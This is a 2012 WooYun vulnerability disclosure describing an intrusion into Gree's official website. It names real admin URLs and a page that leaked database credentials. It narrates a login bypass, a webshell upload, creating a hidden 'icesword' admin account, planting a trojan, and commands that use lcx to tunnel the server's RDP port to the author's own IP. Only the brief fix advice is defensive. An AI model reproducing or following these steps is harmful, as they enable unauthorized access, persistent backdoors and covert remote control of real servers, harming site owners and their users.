漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-09837
漏洞标题:友情检测格力官方网站
相关厂商:格力官方
漏洞作者: Aepl│恋爱
提交时间:2012-07-18 15:59
修复时间:2012-09-01 16:00
公开时间:2012-09-01 16:00
漏洞类型:重要敏感信息泄露
危害等级:中
自评Rank:8
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-07-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-09-01: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
程序目录爆出数据库敏感帐密信息 通过得到的信息进入数据库管理 最后提权服务器最高权限进入服务器
详细说明:
今天在群里无意中看到有人说格力的官方网站是否能日。。
闲着没事就去看了下格力的网站 后来的结果自然是理想的 ☺
直接上神器 扫后台敏感目录先
直接爆出后台地址
http://www.gree.com/admin/config/main.jsp
http://www.gree.com/admin/config
后台地址两枚
又看到爆出敏感目录的后台帐号密码信息
http://www.gree.com/admin/db.jsp
用得到的帐号密码登录 http://www.gree.com/admin/config/main.jsp
接着打开http://www.gree.com/admin/main.jsp 需要帐密登录 但是没有获取到有效的登录帐密 然后得以UP大牛的方法提醒利用浏览器自身入侵的方法
首先打开用得到的帐号密码登录 http://www.gree.com/admin/config/main.jsp 用帐号密码登录 然后再打开http://www.gree.com/admin/main.jsp 到后台登录界面 因为此后台禁止鼠标右键 所以果断快捷键 Ctrl+F5 刷新后台 这时你会惊喜的发现 后台竟然进入了
此后又找到上传 果断传了个shell上去
看着有system权限,就直接添加了个账户netuser--icesword
加完账号,发现内网服务器啊,我靠,多麻烦。
不过tasklist看了下进程,发现也没杀软,干脆先种个马再说。
D:\~~~\> start C:\wmpub\ice.exe
话说我对端口转发还是比较恐惧的,我的2M宽带太蛋疼了。其实,我种马是为了更方便的端口转发。
接着,看看远程端口:
D:\~~~\> REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
端口号 -- > 0x19c8 == 6060 (0x1908是6060的十六进制数)
额,现在开始端口转发:
本机cmd:
#> C:\lcx.exe -listen 2222 3333
/*注释:2222 --转发端口; 3333--连接端口 */
肉鸡服务器cmd:
#> C:\wmpub\lcx.exe -slave 110.88.55.78 2222 127.0.0.1 6060
/*注释: 110.88.55.78是本机IP;6060是服务器远程桌面端口*/
两边的cmd命令行分别敲下Enter键,mstsc连接 127.0.0.1:3333。(可以观察到两边的窗口中,持续的在收发数据包)
漏洞证明:
修复方案:
删除敏感目录信息 修改登录地址 修改掉system权限等
版权声明:转载请注明来源 Aepl│恋爱@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:18 (WooYun评价)